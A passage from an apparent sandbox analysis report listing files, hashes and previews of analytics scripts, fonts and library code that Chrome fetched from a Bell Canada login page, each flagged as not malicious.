                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREuuyqXXl6EmvXQ1CSHI:UrXiFqX1oXMRo
                                                                                                                                                                                                                                                                                                                                      MD5:9CE7691D8D5F612FF9BA2A7959DB2FAE
                                                                                                                                                                                                                                                                                                                                      SHA1:5FA3289AC0A2F1234761C32687AB87007BE7FF57
                                                                                                                                                                                                                                                                                                                                      SHA-256:68228B201FDA277B68D46259AA8625F4E4C865FF3C6D439288460A1DD3E71548
                                                                                                                                                                                                                                                                                                                                      SHA-512:1B2991A156000CCBBD9DEC4AB523713EE683FEF09BDEA4D032390146E4058A36774B41B6FBE606270E930248F0989C1CE063919B0DA7632E74EF58EB08AE8D04
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__12 === 'function' && branch_callback__12("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (899)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1046
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.284674576764338
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:zlqf8aeLct/BMlqf8ae9JUYJM3kJtJaJnGPqJgivJ/oeIpKJB0rxx+sJGoD+L++S:zlq0ut/BMlq0b63kDUUyJxoeBB0dx+s5
                                                                                                                                                                                                                                                                                                                                      MD5:58D67A248E8AA9FA17E0565F3A17013F
                                                                                                                                                                                                                                                                                                                                      SHA1:9567085DF776763D37C02F504270D1DAFD11EFEB
                                                                                                                                                                                                                                                                                                                                      SHA-256:41134E4638511543908FB37189AA4EECABED1783D1E16B6CC89F2271F5733773
                                                                                                                                                                                                                                                                                                                                      SHA-512:7D553C13129884760B0D19D376E820B7DFC1520B47BB2A8F99C32C6A96400120D3BAA439D73A793C28F7ED9EBF598EA98BB7DB26FD06862F32286A9ABF6B0783
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC0999b7fb83bc47cc8ef3706d46ca0c8d-source.min.js
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC0999b7fb83bc47cc8ef3706d46ca0c8d-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC0999b7fb83bc47cc8ef3706d46ca0c8d-source.min.js', "var consent=_satellite.getVar(\"d_consent\");if(1===consent?.analytics&&\"undefined\"!=typeof gtag){var ga4_prop=_satellite.getVar(\"d_ga4_property\"),isPV=_satellite.getVar(\"d_is_pageview\"),_dim_ga=_satellite.getVar(\"d_obj_dim_ga4\"),_evt_ga4=_satellite.getVar(\"d_event_dim_ga4\"),_cf=_satellite.getVar(\"s_cookie_flags\")||\"\";isPV&&(_dim_ga.cookie_flags=_cf,_dim_ga.allow_enhanced_conversions=!0,gtag(\"config\",ga4_prop,_dim_ga)),void 0!==_evt_ga4&&void 0!==_evt_ga4[0]&&_evt_ga4.forEach((function(e){if(\"purchase\"==e.event){var _=_satellite.getVar(\"f_getValue\")([\"s_oPID\"]),a=\"pid_ga4\";if(_satellite.cookie.get(a)==_)return;_satellite.cookie.set(a,_)}gtag(\"event\",e.event,Object.assign
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.584962500721156
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:kn:k
                                                                                                                                                                                                                                                                                                                                      MD5:8ECA36DE2DC5831816C1E7FDEFF2A66A
                                                                                                                                                                                                                                                                                                                                      SHA1:931AFB9F4647D495E1783623E25FC1CB93C9CB91
                                                                                                                                                                                                                                                                                                                                      SHA-256:A689579E15FCDB149AA4B8ADF80C1D26D097A8FA2FA17A2849E8191BDFF686F9
                                                                                                                                                                                                                                                                                                                                      SHA-512:ABE57F9E101635D338944DBE7C542AC18F80DDB1FD9A971BB4A1C22B7FAF7DCAAFC01CB9F6ACEDEBCF3B9C715DFDA44A0ED4E43F34D70A3819316356134484FF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:FL(OA)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.912186294308169
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiRE3/yqXXl6ESQ1CSHI:UrXi8aqX16MRo
                                                                                                                                                                                                                                                                                                                                      MD5:0E7DB6917B4027E0CA2A243015EE306C
                                                                                                                                                                                                                                                                                                                                      SHA1:F92436FBCB5B0BB456422429CC79B75E94DBF508
                                                                                                                                                                                                                                                                                                                                      SHA-256:0BDCF6C0B6918AB166031C75874F9C3CEAA4FD1963CA62AF58A875D12545EDA0
                                                                                                                                                                                                                                                                                                                                      SHA-512:AB243B5DEE97B1AD6126BCE43AADC5055E875994B64A890BAED0F3F453ACE7EE01F5C4BC7D9D17B6C6C7EF16F2B4B7201766546991299CBCCE385DAA824DCD5E
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__5
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__5 === 'function' && branch_callback__5("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 19880, version 1.0
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):19880
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.98934870233127
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:vetCuR85orxHVoWo1m0yTFFiucgL86CgUW/DC5aQ8MoxpuJUZ:vF3o3y1Fyrzcw86mW/+5poxx
                                                                                                                                                                                                                                                                                                                                      MD5:C3D987CF1CFDF2AD3D83A05A1AD8DD56
                                                                                                                                                                                                                                                                                                                                      SHA1:F64DB451FAC03F18DDD6ADE18E713FAA91B8E572
                                                                                                                                                                                                                                                                                                                                      SHA-256:E36F3860D6FE12DF58872C55CF1FB78B7A3FE86D9A27591BFDA5D8CEB34A31F3
                                                                                                                                                                                                                                                                                                                                      SHA-512:6BA2113C153A56CA3CFB88301871A8928F9A35CF1DDAE1DA4FE7C53A0746065A33EFEA77945B6ADF23CB3EAD66DCE6B4E22A0ED3A4B913E6FE2D5D0D35A9B66D
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/styles/media/support/core/fonts/bellslim_medium-webfont.woff2
                                                                                                                                                                                                                                                                                                                                      Preview:wOF2......M...........MA........................?FFTM.....@. .`..Z.4..e.....P..w..P..6.$.... ..L..F..$...5.....P2....B`..(.;62.l..$....1.1D......PH...|.:U(.B..nTE.R..d....7kI.r_.'J..E.pH...~......._{.ZA./..5%.OI.&.Lbp.F.Qp.7...J.:..F.$'.....(......Az.0V.1`.06b..@*.....R.T[`.ba.......;..J.d.-.d.Fw....R.Y..i.YN<....3g.},.&..:."]D.Z.*VI.i.&..*.....Q..v.R......jcw...2.R....E-..N.M..IW.idq...Oo...?.....I..r..6..C.e...pH..ojR.....2H..l...8E...=....*....N..6Z.p..@.....".8.P.0..2.....".AH..io.i/...'...].(.m*....uY_.Y24..H_CZ.(.<....>g.`...p.......nJ.>L.......s/....S'...l(....4Fo.w..)=...S..w.T.@.K..(....J..;c;..].....x,.S,.'[.{...l.k.ig.g.Y.__.c/.hOY.+..a...ll.......f{....}H{V.#..2..vS.....3..3.`f.0....*..w.......C.K.M.S...+..j.../.XJ..\.f(..z..Cm.G.B..p..M}.u....+.3[#Sa.xh...-....P...6.]...h.l..Y(dW..kl.?...?.FFy% of`V.....h.t@=Z...m.F.Qm.{u.N..V3..X.D..d..q;.dW.4~..'j.C...}.......x.2....q.. .|;......s@....t......(.h..X.....[.^}...2l.1g.5n.
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):13
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                                                                                                      MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                                                                                                      SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                                                                                                      SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                                                                                                      SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://td.doubleclick.net/td/rul/953414520?random=1730380359679&cv=11&fst=1730380359679&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0h1v9172277568za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fmybell.bell.ca%2FLogin%3F_branch_match_id%3D1380522052703713689%26_branch_referrer%3DH4sIAAAAAAAAA8soKSkottLXz9VLSs3J0UtO1C8uLSjILyopKkzOT0m1rytKTUstKsrMS49PKsovL04tsnXOKMrPTQUAvip8pzkAAAA%253D&hn=www.googleadservices.com&frm=0&tiba=Log%20in%20to%20MyBell&npa=0&pscdl=noapi&auid=441004151.1730380345&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
                                                                                                                                                                                                                                                                                                                                      Preview:<html></html>
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (561)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):30878
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.395737396054499
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:zpI3kjilKDonpjxqty5qXWZT8HjiyBMAtmN4C4SYCGUCzZiBFS/+0O/txrnSgnk5:z2tlrp6y5+BHm4C4N1hmv0O/zrSe1M
                                                                                                                                                                                                                                                                                                                                      MD5:E733D2CAC0566337507A0508043E9406
                                                                                                                                                                                                                                                                                                                                      SHA1:5F3952DC9DCE1342BF44CF510A85B43356E2E5BB
                                                                                                                                                                                                                                                                                                                                      SHA-256:635B2814DBECB78302D05C529BF175EF815EF51E7C344769247896504843B731
                                                                                                                                                                                                                                                                                                                                      SHA-512:053E72F1F32AA06D56E727525CF33358A97C0FE2EB6EC6886D44BCFFCE728CA18E89453F1173946F70EAE1758C9C76CB47BB2EF4734E450FD3BD611F72944632
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://www.youtube.com/s/player/78fcc867/www-widgetapi.vflset/www-widgetapi.js
                                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';var q;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}.var r=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function da(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}.var t=da(this);function u(a,b){if(b)a:{var c=t;a=a.split(".");for(var d=0;d<a.length-1;d++){var g=a[d];if(!(g in c))break a;c=c[g]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&r(c,a,{configurable:!0,writable:!0,value:b})}}.u("Symbol",function(a){function b(k){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(k||"")+"_"+g++,k)}.function c(k,e){this.g=k;r(this,"description",{configurable:!0,writable:!0,value:e
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (32758)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):567139
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.442340315284627
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:bz37tOOHt4gLSbNVp5PdtAGdyEVZXZIoEL5ANaMLFxHuuBlxx0MugDsZQLrmPATR:bd6HZXZwVANaMiuBPnu/Z+iE
                                                                                                                                                                                                                                                                                                                                      MD5:C17DADF24CB0DE7E3D1611FEB02CD426
                                                                                                                                                                                                                                                                                                                                      SHA1:5560C68B6657EE715F1C62481F7C5E800F073A37
                                                                                                                                                                                                                                                                                                                                      SHA-256:4D990F5FBF7107295DB51EECA8BD5FC8237D7F7A3E6F04C2371FE8606B618E71
                                                                                                                                                                                                                                                                                                                                      SHA-512:BE84434FA3569BEA68FB0B7E3E1BEFEB5E6FF5B30C7BE3505115AC6CD83BD7680A3C437BA067D8E47F9E6FDF67C7A72476378E98A1AF96759F7D002900AEB0E9
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/launch-ENebd7a9b148404f67903d514c40949f24.min.js
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/launch-ENebd7a9b148404f67903d514c40949f24.js`..(function(){window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2024-10-29T16:55:46Z",turbineBuildDate:"2024-08-22T17:32:44Z",turbineVersion:"28.0.0"},environment:{id:"ENebd7a9b148404f67903d514c40949f24",stage:"production"},dataElements:{t_sc_event0010:{defaultValue:"",storageDuration:"pageview",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){var e=_satellite.getVar("d_action_state")||"";return"179-2-1"==e||"179-0-0"==e}}},"meta-mobility-device-type":{defaultValue:"not set",forceLowerCase:!0,storageDuration:"session",modulePath:"core/src/lib/dataElements/domAttribute.js",settings:{elementProperty:"content",elementSelector:"meta[name='MobDeviceType']"}},ga_dim51:{defaultValue:"",storageDuration:"pageview",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return _satel
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):8
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.5
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:x:x
                                                                                                                                                                                                                                                                                                                                      MD5:402E7A087747CB56C718BDE84651F96A
                                                                                                                                                                                                                                                                                                                                      SHA1:7CE01F6381463362CF6AEF2F843A59261E8F5587
                                                                                                                                                                                                                                                                                                                                      SHA-256:662EFAF46C617DDBCB8FF4A2A8F64CFFD3D93630F1003F8E66511F369B87730F
                                                                                                                                                                                                                                                                                                                                      SHA-512:5080D776D0B123F20E97D44472EF2343BC022105AA67FC802B71668BAEB74A81530355589D50B1142165D17EF995AEAC196B6C15136D518A1EC0ABFA13C91D10
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:Success!
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (701)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):558800
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.6661858145390775
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:HHe/N32Dr0RnSXaKyEtG76ZKj1wa89jzQoDjU3+VLs/k5lS64cflFT3O01d:eMapiBMKZxRflF3d
                                                                                                                                                                                                                                                                                                                                      MD5:88A5FED5C87B1D3704AB225CFBE7A130
                                                                                                                                                                                                                                                                                                                                      SHA1:D64243C18FBAA356E4ABAE8414CCC4772D64060B
                                                                                                                                                                                                                                                                                                                                      SHA-256:F8E5F5CE9FF44073CFF24BCD3D2B8AA4E67B67891B14FF929FE4743880FDF82E
                                                                                                                                                                                                                                                                                                                                      SHA-512:8B8D1C9F4C36FD2383C96D0D484A6692F70422934BCCD3DB1F0787E1B753F7D5A8F0C91934805C4D865AED3D4673FF478F0AE23746D0C0E005E60848543B3D33
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__en.js
                                                                                                                                                                                                                                                                                                                                      Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var k=function(){return[function(n,S,D,d,Z,l,h,R,O){return(((n^53)&19)==((n&((((R=[34,2,46],n|72)==n&&(O=St(function(G,A,L){return L=(A=(G=function(f,H){return(f[(H=["replace","indexOf","trim"],H)[1]](d)!=-1&&(f=f.slice(f[H[1]](d))),f)[H[0]](/\s+/g,S)[H[0]](/\n/g,Z)[H[2]]()},G(Z+l)),G(Z+h)),A==L},D)),n)|56)==n&&(h=["https","",0],D=="*"?O="*":(d=g[R[2]](24,!0,h[1],new OI(D)),l=N[30](58,d,h[1]),Z=N[36](25,h[1],g[40](40,l,h[1]),v[21](R[1],1,S,D)),Z.D!=S||(Z.A==h[0]?E[30](90,h[R[1]],443,Z):Z.A=="http"&&.E[30](96,h[R[1]],80,Z)),O=Z.toString())),11))==n&&b.call(this,S),1)&&(O=x[42](16,C[42](44,v[R[0]](23,12),S),[u[20](3
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1532)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1679
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.532033823359727
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:zlCt/BMl4wWeAzy2VBlsO00Mr9cJzCbpwxdkKNmxQ:cBBdReAm8JzLTqQ
                                                                                                                                                                                                                                                                                                                                      MD5:21AC0F261B601976AEF434CE3205A9FE
                                                                                                                                                                                                                                                                                                                                      SHA1:541C9B68B7DEB4AA273CA13132B26D546D451610
                                                                                                                                                                                                                                                                                                                                      SHA-256:4A8792F14CDC2ADC2BD0937CFF81E74D6125E2AD396C251C57BA4885596D4131
                                                                                                                                                                                                                                                                                                                                      SHA-512:568FCB3C780179F8B351A74993DDD148366CB2C0A7D485BE951381F7B8603D30747A89860C8C5FA3358539FD43513397844A026D0DC8506CE6BAD71257615990
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC70933dcf655e4484bbad15d268bdebf1-source.min.js
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC70933dcf655e4484bbad15d268bdebf1-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC70933dcf655e4484bbad15d268bdebf1-source.min.js', "try{var pgn=(pgn=_satellite.getVar(\"d_page_name\")||\"\").toLowerCase(),prevPgn=_satellite.cookie.get(\"__bda_prev_previouspagename\")||\"\",mobRE=/^shop:(mobile:|Cart mobility:Summary|Checkout (mobility:|accessories:))/i,isMob=mobRE.test(pgn)||\"storelocator:landing page\"==pgn&&mobRE.test(prevPgn),ttID=\"CBR71BBC77UFHQ3IULUG\";isMob&&(ttID=\"CBR6VORC77U606K8AE30\"),function(e,t,o){e.TiktokAnalyticsObject=o;var n=e[o]=e[o]||[];n.methods=[\"page\",\"track\",\"identify\",\"instances\",\"debug\",\"on\",\"off\",\"once\",\"ready\",\"alias\",\"group\",\"enableCookie\",\"disableCookie\"],n.setAndDefer=function(e,t){e[t]=function(){e.push([t].concat(Array.prototype.slice.call(arguments,0)))}};for(var a
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 41 x 35, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):604
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.420022861572022
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:6v/7Zs57VnpnrjgwOFa3EX7bcavAOPhDgf57jwfXWXiikz71b0kc:Es57nj3ANDfDgf57cfFBb01
                                                                                                                                                                                                                                                                                                                                      MD5:AC4B395846DB5942E72D401FA05775DC
                                                                                                                                                                                                                                                                                                                                      SHA1:AF4C0218A835EBBD0897A6A6FF329DBA2DF11BC6
                                                                                                                                                                                                                                                                                                                                      SHA-256:9B749E17DDB0B069C94CBB8FF74787C169B9307D3CF95FC4599A27410AC2D15C
                                                                                                                                                                                                                                                                                                                                      SHA-512:DA931F04DE454F892653BE37B7A6C29AD31D11E69E0260C6D890DBD66AA63EEF10380BD5663406BC56ED846D62C8E5CE526E098F7BC3FB6639305ED4E107515D
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell.bell.ca//Web/MYB/custom/image/echat/assets/Chat-Button-Bubbles(D).png
                                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...)...#.......#.....bKGD..............IDATX..M.Ma....\?1..e.w7EJM..B~B)J..l&+..%Kem55..R.......$2V.A..&2.cq.[w.;5.~g......|....s..}..d...F..9yf`......D;.~.N..4..G.. [...8^D.*.*.[.....sEW.(..EQR..K4'..8<7J.....Z.^.qo#Bun...:ON.=..IG.dW.(.Y....F....=.V.....+.3...G=...S.<p.Q.\...Z.....V.G.;`...8.........x..P{.e.x..E}..Po.c.........z..6..2.;Y.|K...@..s.Q*+.FAm.."..p.J]O4.S..T...M..F..B2"~.{g.o....!Y}.K.}5.?E..j/0.D.........I`5...o..j.u9...!X.i......'.z.....u.1..p.8....dJ.E.dV.u..[R.Bj..+..@...W..7..5.u0I.Q'..&..j...R?....T...FrW.}.....p.]:......."......IEND.B`.
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
